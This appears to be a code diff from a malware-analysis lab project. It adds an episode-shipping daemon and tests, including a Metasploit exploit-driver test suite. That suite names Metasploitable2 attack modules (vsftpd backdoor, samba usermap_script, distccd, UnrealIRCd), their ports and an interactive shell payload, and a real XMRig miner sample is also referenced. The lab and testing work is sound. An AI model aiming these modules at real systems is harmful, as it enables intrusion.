    parser = argparse.ArgumentParser(prog="cis490-shipper")
    parser.add_argument(
        "--config",
        default="/etc/cis490/lab-host.toml",
        help="Path to lab-host config (TOML)",
    )
    parser.add_argument(
        "--ping",
        action="store_true",
        help="Hit /v1/ping on the receiver and exit",
    )
    parser.add_argument(
        "--once",
        action="store_true",
        help="One scan pass, then exit (default is long-running daemon)",
    )
    parser.add_argument("--log-level", default="INFO")
    args = parser.parse_args(argv)

    _setup_logging(args.log_level)
    log = logging.getLogger("cis490.shipper")

    try:
        cfg = ShipperConfig.load(args.config)
    except (OSError, ValueError, TypeError) as e:
        log.error("config error: %s", e)
        return 2

    transport = ShipperTransport(cfg)

    if args.ping:
        result = transport.ping()
        # Print structured one-liner for CI / test pipelines.
        print(json.dumps({
            "ok": result.ok,
            "status_code": result.status_code,
            "host_id": cfg.host_id,
            "receiver": cfg.receiver.url,
            "body": result.body,
            "error": result.error,
        }))
        return 0 if result.ok else 1

    queue = ShipperQueue(cfg, transport)
    if args.once:
        result = queue.run_once()
        log.info(
            "scan complete: scanned=%d shipped=%d transient=%d conflicts=%d fatal=%d",
            result.scanned, result.shipped, result.transient_failures,
            result.conflicts, result.fatal,
        )
        # Exit code reflects fatal-only; transient failures aren't an error
        # because the next pass / service restart will retry.
        return 1 if result.fatal else 0

    # Daemon mode
    stopping = False
    def _stop(signum, frame):  # noqa: ARG001
        nonlocal stopping
        log.info("received signal %s; finishing pass and exiting", signum)
        stopping = True
    signal.signal(signal.SIGTERM, _stop)
    signal.signal(signal.SIGINT, _stop)

    log.info(
        "shipper starting: host_id=%s data_root=%s receiver=%s",
        cfg.host_id, cfg.data_root, cfg.receiver.url,
    )
    queue.run_forever(stop_check=lambda: stopping)
    return 0


if __name__ == "__main__":
    sys.exit(main())
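
In `--ping` mode the CLI prints one JSON object with the keys `ok`, `status_code`, `host_id`, `receiver`, `body` and `error`. A CI job could turn that line into a short human-readable summary along these lines. This is a sketch only: `summarize_ping` is a hypothetical helper, and the sample values (`lab-01`, the error text) are made up for illustration.

```python
import json


def summarize_ping(line: str) -> str:
    """Turn the shipper's one-line --ping JSON report into a short summary."""
    report = json.loads(line)
    target = f"{report['host_id']} -> {report['receiver']}"
    if report["ok"]:
        return f"{target}: ok"
    # status_code 0 means the request never got an HTTP response.
    reason = report.get("error") or f"status {report['status_code']}"
    return f"{target}: FAILED ({reason})"


# Sample report shaped like the CLI output (values are placeholders).
sample = json.dumps({
    "ok": False,
    "status_code": 0,
    "host_id": "lab-01",
    "receiver": "https://collector.wg",
    "body": None,
    "error": "connection refused",
})
print(summarize_ping(sample))
```

The process exit code (0 on success, 1 on a failed ping, 2 on a config error) remains the primary signal; the JSON is there for richer diagnostics.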
91
shipper/config.py
Normal file
@@ -0,0 +1,91 @@
"""Lab-host shipper config — loaded from /etc/cis490/lab-host.toml."""

from __future__ import annotations

import tomllib
from dataclasses import dataclass, field
from pathlib import Path


@dataclass(frozen=True)
class ReceiverEndpoint:
    url: str  # e.g. "https://collector.wg"
    ca_bundle: Path | None = None
    client_cert: Path | None = None
    client_key: Path | None = None
    bearer_token: str | None = None
    verify_tls: bool = True


@dataclass(frozen=True)
class ShipperConfig:
    host_id: str
    data_root: Path  # Lab-host data root; episodes/, outbox/, shipped/ live here.
    receiver: ReceiverEndpoint
    # Daemon mode: how often to scan for new done.marker files.
    scan_interval_s: float = 5.0
    # PUT timeout per episode. Tarballs are bounded by max_episode_bytes;
    # at WG speeds this is well under 60s for a typical episode.
    request_timeout_s: float = 60.0
    # Backoff schedule on transient (5xx / network) failures, in seconds,
    # capped at the last entry. The shipper's scan loop will pick the
    # episode up again on the next pass regardless.
    backoff_seconds: tuple[float, ...] = (1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 60.0, 120.0, 300.0)
    # Local retention before pruning data/shipped/.
    keep_local_for_days: int = 7

    @property
    def episodes_dir(self) -> Path:
        return self.data_root / "episodes"

    @property
    def outbox_dir(self) -> Path:
        return self.data_root / "outbox"

    @property
    def shipped_dir(self) -> Path:
        return self.data_root / "shipped"

    @classmethod
    def load(cls, path: str | Path) -> "ShipperConfig":
        with open(path, "rb") as f:
            data = tomllib.load(f)

        host_id = data.get("host_id")
        if not isinstance(host_id, str) or not host_id:
            raise ValueError("lab-host config: host_id (string) required at top level")

        paths = data.get("paths", {})
        data_root = Path(paths.get("data_root", "/var/lib/cis490/data")).resolve()

        rcv = data.get("receiver", {})
        url = rcv.get("url")
        if not isinstance(url, str) or not url:
            raise ValueError("lab-host config: receiver.url required")

        receiver = ReceiverEndpoint(
            url=url.rstrip("/"),
            ca_bundle=_optional_path(rcv.get("ca_bundle")),
            client_cert=_optional_path(rcv.get("client_cert")),
            client_key=_optional_path(rcv.get("client_key")),
            bearer_token=rcv.get("bearer_token"),
            verify_tls=bool(rcv.get("verify_tls", True)),
        )

        retention = data.get("retention", {})
        return cls(
            host_id=host_id,
            data_root=data_root,
            receiver=receiver,
            scan_interval_s=float(data.get("shipper", {}).get("scan_interval_s", 5.0)),
            request_timeout_s=float(data.get("shipper", {}).get("request_timeout_s", 60.0)),
            keep_local_for_days=int(retention.get("keep_local_for_days", 7)),
        )


def _optional_path(v: object) -> Path | None:
    if v in (None, ""):
        return None
    if isinstance(v, str):
        return Path(v).expanduser()
    raise TypeError(f"expected path string, got {type(v).__name__}")
195
shipper/queue.py
Normal file
@@ -0,0 +1,195 @@
"""Shipper episode queue — scan, compress, ship, retire.

State machine, mirroring docs/transport.md:

    data/episodes/<id>/done.marker
            |
            v
    tar+zstd → data/outbox/<id>.tar.zst.partial
            |
            v
    rename → data/outbox/<id>.tar.zst
            |
            v
    PUT to receiver
            |
            +-- 200/201 → mv data/episodes/<id> → data/shipped/<id>
            |             rm data/outbox/<id>.tar.zst
            |
            +-- 409     → leave files in place (the local + remote tarball
            |             differ; manual triage)
            |
            +-- 5xx/net → leave outbox tarball; retry on next pass
            |
            +-- 4xx     → log + skip (caller-side bug, doesn't self-heal)

Idempotent on every pass. A crash mid-tar leaves only a ``.partial``
which the next pass overwrites. A crash mid-PUT leaves the tarball in
``outbox/`` and the next pass re-ships it; the receiver responds 200
on a matching sha256, 409 on a divergent one.
"""

from __future__ import annotations

import logging
import shutil
import subprocess
import tarfile
import tempfile
import time
from dataclasses import dataclass
from pathlib import Path

from .config import ShipperConfig
from .transport import ShipperTransport, ShipResult, hash_file


log = logging.getLogger("cis490.shipper.queue")


@dataclass(frozen=True)
class PassResult:
    scanned: int
    shipped: int
    transient_failures: int
    conflicts: int
    fatal: int


class ShipperQueue:
    def __init__(self, cfg: ShipperConfig, transport: ShipperTransport) -> None:
        self.cfg = cfg
        self.transport = transport
        cfg.episodes_dir.mkdir(parents=True, exist_ok=True)
        cfg.outbox_dir.mkdir(parents=True, exist_ok=True)
        cfg.shipped_dir.mkdir(parents=True, exist_ok=True)

    # ---- main entry point ---------------------------------------------

    def run_once(self) -> PassResult:
        """One scan pass. Returns counts for logging / tests."""
        ready = self._ready_episodes()
        scanned = len(ready)
        shipped = 0
        transient = 0
        conflicts = 0
        fatal = 0

        for ep_dir in ready:
            episode_id = ep_dir.name
            try:
                tarball, sha = self._tar_episode(ep_dir)
            except Exception:
                log.exception("tar failed for %s", episode_id)
                transient += 1
                continue

            res = self.transport.ship_tarball(episode_id, tarball, sha)
            log.info(
                "ship %s -> %s (%d) %s",
                episode_id, res.status, res.status_code, res.error or "",
            )

            if res.status in ("stored", "already-present"):
                self._retire(ep_dir, tarball)
                shipped += 1
            elif res.status == "conflict":
                conflicts += 1
                # Keep the tarball + episode dir in place. Operator must
                # decide whether to drop our copy or fix the remote one.
            elif res.status == "transient":
                transient += 1
            else:  # fatal
                fatal += 1

        return PassResult(
            scanned=scanned,
            shipped=shipped,
            transient_failures=transient,
            conflicts=conflicts,
            fatal=fatal,
        )

    def run_forever(self, *, stop_check=lambda: False) -> None:
        while not stop_check():
            try:
                self.run_once()
            except Exception:
                log.exception("scan pass crashed; sleeping anyway")
            # Coarse sleep: we don't need precise scheduling and we
            # don't want a tight loop on errors.
            t0 = time.monotonic()
            while time.monotonic() - t0 < self.cfg.scan_interval_s:
                if stop_check():
                    return
                time.sleep(0.5)

    # ---- internals -----------------------------------------------------

    def _ready_episodes(self) -> list[Path]:
        out: list[Path] = []
        if not self.cfg.episodes_dir.exists():
            return out
        for ep in sorted(self.cfg.episodes_dir.iterdir()):
            if ep.is_dir() and (ep / "done.marker").exists():
                out.append(ep)
        return out

    def _tar_episode(self, ep_dir: Path) -> tuple[Path, str]:
        """Tar+zstd the episode dir into outbox. Idempotent — overwrites
        any prior partial. Returns ``(tarball_path, sha256_hex)``."""
        episode_id = ep_dir.name
        outbox = self.cfg.outbox_dir
        partial = outbox / f"{episode_id}.tar.zst.partial"
        final = outbox / f"{episode_id}.tar.zst"

        partial.unlink(missing_ok=True)

        # We use the system `zstd` for streaming compression: pipe a
        # tar stream into `zstd -T0 -19` to get a deterministic tarball
        # without buffering the whole tar in memory or pulling in the
        # python-zstandard dependency. There is no in-process fallback:
        # if the binary isn't on PATH we raise (see the else branch).
        if _which_zstd():
            with partial.open("wb") as zout:
                proc = subprocess.Popen(
                    ["zstd", "-q", "-T0", "-19", "--stdout"],
                    stdin=subprocess.PIPE, stdout=zout,
                )
                assert proc.stdin is not None
                with tarfile.open(fileobj=proc.stdin, mode="w|") as tf:
                    tf.add(ep_dir, arcname=episode_id, recursive=True)
                proc.stdin.close()
                rc = proc.wait()
                if rc != 0:
                    partial.unlink(missing_ok=True)
                    raise RuntimeError(f"zstd exited {rc}")
        else:
            # No fallback: python's built-in gzip/zlib output is NOT
            # zstd-compatible. Surface the missing binary rather than
            # silently producing a non-zstd tarball.
            partial.unlink(missing_ok=True)
            raise RuntimeError(
                "the `zstd` binary is required on the lab host. "
                "Install it via your package manager."
            )

        sha = hash_file(partial)
        partial.replace(final)
        return final, sha

    def _retire(self, ep_dir: Path, tarball: Path) -> None:
        """Move episode dir → shipped/, drop the tarball."""
        target = self.cfg.shipped_dir / ep_dir.name
        if target.exists():
            # Belt-and-suspenders: re-shipping an already-retired
            # episode shouldn't happen (the dir was moved), but if it
            # does, prefer the existing copy and just clean up.
            shutil.rmtree(ep_dir, ignore_errors=True)
        else:
            ep_dir.replace(target)
        tarball.unlink(missing_ok=True)


def _which_zstd() -> bool:
    return shutil.which("zstd") is not None
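
The state machine in the queue.py docstring boils down to a mapping from the receiver's HTTP status to one of five outcomes, of which only two retire the episode. The mapping can be sketched on its own as follows. `classify` and `RETIRE` are hypothetical names used for illustration, and status code 0 stands for a network error that produced no HTTP response, matching how the transport reports it.

```python
def classify(status_code: int) -> str:
    """Map an HTTP status (0 = network error) to a shipper outcome."""
    if status_code == 201:
        return "stored"
    if status_code == 200:
        return "already-present"
    if status_code == 409:
        return "conflict"
    if status_code == 0 or 500 <= status_code < 600:
        return "transient"
    return "fatal"  # any other status, typically a 4xx caller-side bug


# Only these outcomes move the episode to shipped/ and drop the tarball.
RETIRE = {"stored", "already-present"}

for code in (201, 200, 409, 503, 0, 404):
    outcome = classify(code)
    action = "retire" if outcome in RETIRE else "keep in place"
    print(code, outcome, action)
```

Keeping the classification separate from the file moves is what lets the queue own the retry policy: a transient result leaves everything in place, so the next scan pass simply tries again.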
203
shipper/transport.py
Normal file
@@ -0,0 +1,203 @@
|||
"""HTTP transport for the lab-host shipper.
|
||||
|
||||
Two operations against the receiver:
|
||||
POST /v1/ping — smoke test
|
||||
PUT /v1/episodes/<host>/<episode>.tar.zst — episode upload
|
||||
|
||||
Auth is mTLS (client cert from wg-pki) when configured. A bearer token
|
||||
is supported as a stand-in during early bring-up before the cert is
|
||||
issued; production runs should set both.
|
||||
|
||||
The transport returns small dataclasses rather than throwing — the
|
||||
caller (shipper queue) decides whether to retry, move to shipped/, or
|
||||
alert. This keeps the retry policy in one place.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import logging
|
||||
import ssl
|
||||
from dataclasses import dataclass
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
import httpx
|
||||
|
||||
from .config import ReceiverEndpoint, ShipperConfig
|
||||
|
||||
|
||||
log = logging.getLogger("cis490.shipper.transport")
|
||||
|
||||
|
||||
SCHEMA_VERSION = 1
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class PingResult:
|
||||
ok: bool
|
||||
status_code: int
|
||||
body: dict[str, Any] | None
|
||||
error: str | None
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class ShipResult:
|
||||
status: str # "stored" | "already-present" | "conflict" | "transient" | "fatal"
|
||||
status_code: int
|
||||
sha256: str | None
|
||||
body: dict[str, Any] | None
|
||||
error: str | None
|
||||
|
||||
|
||||
def _build_ssl_context(rcv: ReceiverEndpoint) -> ssl.SSLContext | bool:
|
||||
"""Build an SSL context honoring the wg-pki CA bundle + client cert.
|
||||
|
||||
Returns True / a bundle path / a context. httpx accepts all three;
|
||||
we use a context so we can attach the client cert for mTLS."""
|
||||
if not rcv.url.lower().startswith("https://"):
|
||||
return False
|
||||
ctx = ssl.create_default_context(
|
||||
cafile=str(rcv.ca_bundle) if rcv.ca_bundle else None,
|
||||
)
|
||||
if not rcv.verify_tls:
|
||||
# Dev-only path; production lab-hosts should always pin the
|
||||
# wg-pki CA. Logged loudly so it doesn't slip through.
|
||||
log.warning("TLS verification disabled — dev-only configuration")
|
||||
ctx.check_hostname = False
|
||||
ctx.verify_mode = ssl.CERT_NONE
|
||||
if rcv.client_cert and rcv.client_key:
|
||||
ctx.load_cert_chain(str(rcv.client_cert), str(rcv.client_key))
|
||||
return ctx
|
||||
|
||||
|
||||
class ShipperTransport:
|
||||
def __init__(self, cfg: ShipperConfig) -> None:
|
||||
self.cfg = cfg
|
||||
self._verify = _build_ssl_context(cfg.receiver)
|
||||
|
||||
# ---- ping ----------------------------------------------------------
|
||||
|
||||
def ping(self) -> PingResult:
|
||||
url = f"{self.cfg.receiver.url}/v1/ping"
|
||||
headers = self._common_headers()
|
||||
try:
|
||||
with httpx.Client(verify=self._verify, timeout=self.cfg.request_timeout_s) as c:
|
||||
r = c.post(url, headers=headers, content=b"")
|
||||
except httpx.HTTPError as e:
|
||||
return PingResult(ok=False, status_code=0, body=None, error=str(e))
|
||||
|
||||
body: dict[str, Any] | None = None
|
||||
try:
|
||||
body = r.json()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
if r.status_code == 200 and isinstance(body, dict) and body.get("ok"):
|
||||
return PingResult(ok=True, status_code=200, body=body, error=None)
|
||||
return PingResult(
|
||||
ok=False,
|
||||
status_code=r.status_code,
|
||||
body=body,
|
||||
error=f"unexpected status {r.status_code}",
|
||||
)
|
||||
|
||||
# ---- ship ----------------------------------------------------------
|
||||
|
||||
def ship_tarball(
|
||||
self,
|
||||
episode_id: str,
|
||||
tarball_path: Path,
|
||||
sha256_hex: str,
|
||||
) -> ShipResult:
|
||||
url = (
|
||||
f"{self.cfg.receiver.url}/v1/episodes/"
|
||||
f"{self.cfg.host_id}/{episode_id}.tar.zst"
|
||||
)
|
||||
size = tarball_path.stat().st_size
|
||||
headers = self._common_headers() | {
|
||||
"Content-Type": "application/zstd",
|
||||
"Content-Length": str(size),
|
||||
"X-Content-SHA256": sha256_hex,
|
||||
"X-Episode-Id": episode_id,
|
||||
}
|
||||
|
||||
try:
|
||||
with httpx.Client(verify=self._verify, timeout=self.cfg.request_timeout_s) as c, \
|
||||
tarball_path.open("rb") as body:
|
||||
# httpx streams from a file-like object via the `content=` kwarg.
|
||||
r = c.put(url, headers=headers, content=body)
|
||||
except httpx.HTTPError as e:
|
||||
return ShipResult(
|
||||
status="transient",
|
||||
status_code=0,
|
||||
sha256=None,
|
||||
body=None,
|
||||
error=str(e),
|
||||
)
|
||||
|
||||
body_json: dict[str, Any] | None = None
|
||||
try:
|
||||
body_json = r.json()
|
||||
except ValueError: # non-JSON or undecodable body; leave body_json as None
|
||||
pass
|
||||
|
||||
if r.status_code == 201:
|
||||
return ShipResult(
|
||||
status="stored",
|
||||
status_code=201,
|
||||
sha256=sha256_hex,
|
||||
body=body_json,
|
||||
error=None,
|
||||
)
|
||||
if r.status_code == 200:
|
||||
return ShipResult(
|
||||
status="already-present",
|
||||
status_code=200,
|
||||
sha256=sha256_hex,
|
||||
body=body_json,
|
||||
error=None,
|
||||
)
|
||||
if r.status_code == 409:
|
||||
return ShipResult(
|
||||
status="conflict",
|
||||
status_code=409,
|
||||
sha256=sha256_hex,
|
||||
body=body_json,
|
||||
error="receiver already has a different sha256 for this id",
|
||||
)
|
||||
if 500 <= r.status_code < 600:
|
||||
return ShipResult(
|
||||
status="transient",
|
||||
status_code=r.status_code,
|
||||
sha256=None,
|
||||
body=body_json,
|
||||
error=f"server error {r.status_code}",
|
||||
)
|
||||
# 4xx other than 409: caller-side bug — don't retry.
|
||||
return ShipResult(
|
||||
status="fatal",
|
||||
status_code=r.status_code,
|
||||
sha256=None,
|
||||
body=body_json,
|
||||
error=f"client error {r.status_code}",
|
||||
)
|
||||
|
||||
# ---- helpers -------------------------------------------------------
|
||||
|
||||
def _common_headers(self) -> dict[str, str]:
|
||||
h: dict[str, str] = {
|
||||
"X-Lab-Host": self.cfg.host_id,
|
||||
"X-Schema-Version": str(SCHEMA_VERSION),
|
||||
}
|
||||
if self.cfg.receiver.bearer_token:
|
||||
h["Authorization"] = f"Bearer {self.cfg.receiver.bearer_token}"
|
||||
return h
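Reviewer note: the status handling in `ship_tarball` reduces to a small mapping from HTTP status code to outcome. The sketch below restates that mapping as a pure function so the retry policy is easy to see. `classify_ship_status` and `should_retry` are hypothetical names that do not appear in this commit, and the retry rule is an assumption about how a caller might use the result. Network-level failures (`httpx.HTTPError`) are handled before this point in the original and are reported as `transient` with `status_code=0`, so they are out of scope here.

```python
from typing import Literal

ShipStatus = Literal["stored", "already-present", "conflict", "transient", "fatal"]


def classify_ship_status(status_code: int) -> ShipStatus:
    """Map a receiver HTTP status code to a shipper outcome (hypothetical helper)."""
    if status_code == 201:
        return "stored"           # receiver wrote a new tarball
    if status_code == 200:
        return "already-present"  # same episode id, same sha256: idempotent re-send
    if status_code == 409:
        return "conflict"         # same episode id, different sha256
    if 500 <= status_code < 600:
        return "transient"        # server-side failure: worth retrying later
    return "fatal"                # everything else: retrying will not help


def should_retry(status: ShipStatus) -> bool:
    """Assumed caller policy: only transient outcomes are re-queued."""
    return status == "transient"
```

Keeping the mapping free of I/O means it can be unit-tested without a receiver or a fake transport.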
|
||||
|
||||
|
||||
def hash_file(path: Path) -> str:
|
||||
h = hashlib.sha256()
|
||||
with path.open("rb") as f:
|
||||
for chunk in iter(lambda: f.read(1024 * 1024), b""):
|
||||
h.update(chunk)
|
||||
return h.hexdigest()
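Reviewer note: a quick way to convince yourself that the chunked read in `hash_file` matches a one-shot digest is to hash a payload larger than one chunk both ways. The sketch below copies the function and adds a `chunk_size` parameter and a `demo` helper. Both additions are illustrative and not part of this commit, and the file name is made up.

```python
import hashlib
import tempfile
from pathlib import Path


def hash_file(path: Path, chunk_size: int = 1024 * 1024) -> str:
    """Stream a file through SHA-256 without loading it all into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        # iter(callable, sentinel) keeps calling f.read() until it returns b"".
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def demo() -> bool:
    """Return True when the streamed digest equals the one-shot digest."""
    payload = b"episode-bytes" * 100_000  # about 1.3 MB, so more than one chunk
    with tempfile.TemporaryDirectory() as tmp:
        p = Path(tmp) / "episode.tar.zst"  # hypothetical file name
        p.write_bytes(payload)
        return hash_file(p) == hashlib.sha256(payload).hexdigest()
```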
|
||||
|
|
@@ -74,6 +74,57 @@ def test_episode_id_can_be_overridden(tmp_path: Path) -> None:
|
|||
assert result.episode_dir == tmp_path / "episodes" / "01TEST"
|
||||
|
||||
|
||||
def test_meta_sample_records_full_sample_when_passed(tmp_path: Path) -> None:
|
||||
"""EpisodeConfig.sample → meta.sample carries identity + kind so
|
||||
trainers can join episodes by family/sha256 without re-deriving
|
||||
from events. With no Sample, meta.sample stays null."""
|
||||
import os as _os
|
||||
|
||||
from samples.manifest import Sample
|
||||
|
||||
s = Sample(
|
||||
name="xmrig-cryptominer",
|
||||
family="XMRig",
|
||||
category="cryptominer",
|
||||
profile="cpu-saturate",
|
||||
sha256="abc" * 21 + "d", # 64 hex
|
||||
source="MalwareBazaar",
|
||||
)
|
||||
cfg = EpisodeConfig(
|
||||
target_pid=_os.getpid(),
|
||||
duration_s=0.1,
|
||||
interval_ms=50,
|
||||
data_root=tmp_path,
|
||||
sample=s,
|
||||
)
|
||||
result = EpisodeRunner(cfg).run()
|
||||
|
||||
meta = json.loads((result.episode_dir / "meta.json").read_text())
|
||||
assert meta["sample"] is not None
|
||||
assert meta["sample"]["name"] == "xmrig-cryptominer"
|
||||
assert meta["sample"]["family"] == "XMRig"
|
||||
assert meta["sample"]["category"] == "cryptominer"
|
||||
assert meta["sample"]["profile"] == "cpu-saturate"
|
||||
assert meta["sample"]["kind"] == "real"
|
||||
assert meta["sample"]["sha256"] == "abc" * 21 + "d"
|
||||
|
||||
|
||||
def test_meta_sample_is_null_for_v1_path(tmp_path: Path) -> None:
|
||||
"""No sample passed → the v1 fallback path. meta.sample stays
|
||||
null so trainers can detect (and filter out) info-less runs."""
|
||||
import os as _os
|
||||
|
||||
cfg = EpisodeConfig(
|
||||
target_pid=_os.getpid(),
|
||||
duration_s=0.1,
|
||||
interval_ms=50,
|
||||
data_root=tmp_path,
|
||||
)
|
||||
result = EpisodeRunner(cfg).run()
|
||||
meta = json.loads((result.episode_dir / "meta.json").read_text())
|
||||
assert meta["sample"] is None
|
||||
|
||||
|
||||
def test_episode_writes_done_marker_last(tmp_path: Path) -> None:
|
||||
"""done.marker should not appear until meta.json has ended_at_wall set."""
|
||||
cfg = EpisodeConfig(
|
||||
|
|
|
|||
484
tests/test_exploits.py
Normal file
|
|
@@ -0,0 +1,484 @@
|
|||
"""Tests for the Tier-3 exploit driver and its module loader.
|
||||
|
||||
The msfrpc transport itself is exercised against a fake client so the
|
||||
suite runs in-process. A live-msfrpcd integration test is out of
|
||||
scope here — the wire format is small and the high-value coverage is
|
||||
the phase-to-action mapping plus the events the driver emits.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
import pytest
|
||||
|
||||
from exploits.driver import DriverConfig, MSFExploitDriver
|
||||
from exploits.modules import ModuleConfig, load_module_config
|
||||
|
||||
|
||||
REPO_ROOT = Path(__file__).resolve().parent.parent
|
||||
MODULES_DIR = REPO_ROOT / "exploits" / "modules"
|
||||
|
||||
|
||||
# -----------------------------------------------------------------------
|
||||
# Module config loader
|
||||
# -----------------------------------------------------------------------
|
||||
|
||||
def test_module_catalog_has_at_least_five_metasploitable2_vectors() -> None:
|
||||
"""The fleet's entry-vector variety depends on the module catalog
|
||||
being populated. Five Metasploitable2 vectors is the minimum
|
||||
that gives the trainer a non-trivial diversity of armed →
|
||||
infecting transition shapes."""
|
||||
from exploits.modules import load_module_configs
|
||||
catalog = load_module_configs(MODULES_DIR)
|
||||
assert len(catalog) >= 5, \
|
||||
f"only {len(catalog)} modules; need at least 5 for fleet variety"
|
||||
names = set(catalog.keys())
|
||||
expected = {
|
||||
"vsftpd_234_backdoor",
|
||||
"samba_usermap_script",
|
||||
"distccd_command_exec",
|
||||
"php_cgi_arg_injection",
|
||||
"unreal_ircd_3281_backdoor",
|
||||
}
|
||||
missing = expected - names
|
||||
assert not missing, f"missing canonical modules: {missing}"
|
||||
|
||||
|
||||
def test_load_vsftpd_module_config_round_trip() -> None:
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
assert cfg.name == "vsftpd_234_backdoor"
|
||||
assert cfg.module_type == "exploit"
|
||||
assert cfg.module_path == "unix/ftp/vsftpd_234_backdoor"
|
||||
assert cfg.options["RPORT"] == 21
|
||||
assert cfg.options["RHOSTS"] == "{{ target_ip }}"
|
||||
assert cfg.payload_path == "cmd/unix/interact"
|
||||
|
||||
|
||||
def test_render_options_substitutes_target_ip() -> None:
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
rendered = cfg.render_options(target_ip="10.200.0.10")
|
||||
assert rendered["RHOSTS"] == "10.200.0.10"
|
||||
assert rendered["RPORT"] == 21
|
||||
assert rendered["PAYLOAD"] == "cmd/unix/interact"
|
||||
|
||||
|
||||
def test_select_module_is_deterministic() -> None:
|
||||
from exploits.modules import load_module_configs, select_module
|
||||
catalog = load_module_configs(MODULES_DIR)
|
||||
a = select_module(catalog, host_id="lab-7", slot=2, episode_index=11)
|
||||
b = select_module(catalog, host_id="lab-7", slot=2, episode_index=11)
|
||||
assert a is b
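Reviewer note: the selection tests in this file ask for three properties: the same inputs give the same module, different hosts tend to start in different places, and one host eventually visits the whole catalog. The sketch below is one scheme that would satisfy them, not the implementation in `exploits.modules`, which this diff does not show. `select_item` is a hypothetical name and it takes a plain sequence rather than the catalog dict. It uses `hashlib` rather than the built-in `hash()`, because string hashes are salted per process and would break determinism across runs.

```python
import hashlib
from typing import Sequence, TypeVar

T = TypeVar("T")


def select_item(items: Sequence[T], *, host_id: str, slot: int, episode_index: int) -> T:
    """Pick an item from a stable per-(host, slot) offset plus the episode index."""
    if not items:
        raise ValueError("catalog is empty")
    # Stable across processes and machines, unlike hash(str).
    digest = hashlib.sha256(f"{host_id}:{slot}".encode()).digest()
    offset = int.from_bytes(digest[:8], "big")
    # Consecutive episodes step through the catalog one entry at a time,
    # so any len(items) consecutive episodes cover every entry.
    return items[(offset + episode_index) % len(items)]
```

With this layout the catalog walk is guaranteed rather than probabilistic; variety across hosts still depends on the hash offsets differing.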
|
||||
|
||||
|
||||
def test_select_module_diversifies_across_hosts() -> None:
|
||||
from exploits.modules import load_module_configs, select_module
|
||||
catalog = load_module_configs(MODULES_DIR)
|
||||
matches = 0
|
||||
for slot in range(20):
|
||||
a = select_module(catalog, host_id="alice", slot=slot, episode_index=0)
|
||||
b = select_module(catalog, host_id="bob", slot=slot, episode_index=0)
|
||||
if a is b:
|
||||
matches += 1
|
||||
assert matches < 15, "host_id seed isn't producing module variety"
|
||||
|
||||
|
||||
def test_select_module_walks_catalog() -> None:
|
||||
from exploits.modules import load_module_configs, select_module
|
||||
catalog = load_module_configs(MODULES_DIR)
|
||||
seen = set()
|
||||
for ep in range(200):
|
||||
seen.add(select_module(catalog, host_id="lab-x", slot=0, episode_index=ep).name)
|
||||
assert seen == set(catalog.keys()), \
|
||||
f"only saw {len(seen)}/{len(catalog)} modules across 200 episodes"
|
||||
|
||||
|
||||
def test_module_target_port_pulls_rport() -> None:
|
||||
from exploits.modules import load_module_configs, module_target_port
|
||||
catalog = load_module_configs(MODULES_DIR)
|
||||
assert module_target_port(catalog["vsftpd_234_backdoor"]) == 21
|
||||
assert module_target_port(catalog["samba_usermap_script"]) == 139
|
||||
assert module_target_port(catalog["distccd_command_exec"]) == 3632
|
||||
assert module_target_port(catalog["php_cgi_arg_injection"]) == 80
|
||||
assert module_target_port(catalog["unreal_ircd_3281_backdoor"]) == 6667
|
||||
|
||||
|
||||
def test_render_options_handles_both_brace_styles(tmp_path: Path) -> None:
|
||||
p = tmp_path / "x.toml"
|
||||
p.write_text(
|
||||
'[module]\n'
|
||||
'type = "exploit"\n'
|
||||
'path = "unix/ftp/example"\n'
|
||||
'[module.options]\n'
|
||||
'RHOSTS = "{{target_ip}}"\n'
|
||||
'LHOST = "{{ target_ip }}"\n'
|
||||
)
|
||||
cfg = load_module_config(p)
|
||||
rendered = cfg.render_options(target_ip="10.0.0.5")
|
||||
assert rendered["RHOSTS"] == "10.0.0.5"
|
||||
assert rendered["LHOST"] == "10.0.0.5"
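Reviewer note: accepting both `{{target_ip}}` and `{{ target_ip }}` is most simply done with one regular expression that tolerates whitespace inside the braces. The sketch below is a standalone function under that assumption; the real `ModuleConfig.render_options` is not shown in this diff and, per the tests above, also adds a `PAYLOAD` entry, which is omitted here.

```python
import re
from typing import Any

# Matches {{target_ip}} and {{ target_ip }} (any whitespace inside the braces).
_TARGET_IP = re.compile(r"\{\{\s*target_ip\s*\}\}")


def render_options(options: dict[str, Any], target_ip: str) -> dict[str, Any]:
    """Return a copy of options with the target_ip placeholder filled in."""
    rendered: dict[str, Any] = {}
    for key, value in options.items():
        if isinstance(value, str):
            # A function replacement avoids backslash escapes being interpreted.
            rendered[key] = _TARGET_IP.sub(lambda _m: target_ip, value)
        else:
            rendered[key] = value  # non-strings such as RPORT pass through untouched
    return rendered
```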
|
||||
|
||||
|
||||
def test_load_rejects_missing_module_path(tmp_path: Path) -> None:
|
||||
p = tmp_path / "bad.toml"
|
||||
p.write_text('[module]\ntype = "exploit"\n')
|
||||
with pytest.raises(ValueError, match="module.path"):
|
||||
load_module_config(p)
|
||||
|
||||
|
||||
def test_load_rejects_unknown_module_type(tmp_path: Path) -> None:
|
||||
p = tmp_path / "bad.toml"
|
||||
p.write_text(
|
||||
'[module]\ntype = "evil"\npath = "unix/ftp/x"\n'
|
||||
)
|
||||
with pytest.raises(ValueError, match="module.type"):
|
||||
load_module_config(p)
|
||||
|
||||
|
||||
# -----------------------------------------------------------------------
|
||||
# Exploit driver — phase transitions against a fake MSFRpcClient
|
||||
# -----------------------------------------------------------------------
|
||||
|
||||
class FakeMSFRpcClient:
|
||||
"""Stand-in that records every method called and lets a test
|
||||
script the apparent state of msfrpcd (sessions, return values)."""
|
||||
|
||||
def __init__(self, *, sessions_after_fire: dict[int, dict[str, Any]] | None = None) -> None:
|
||||
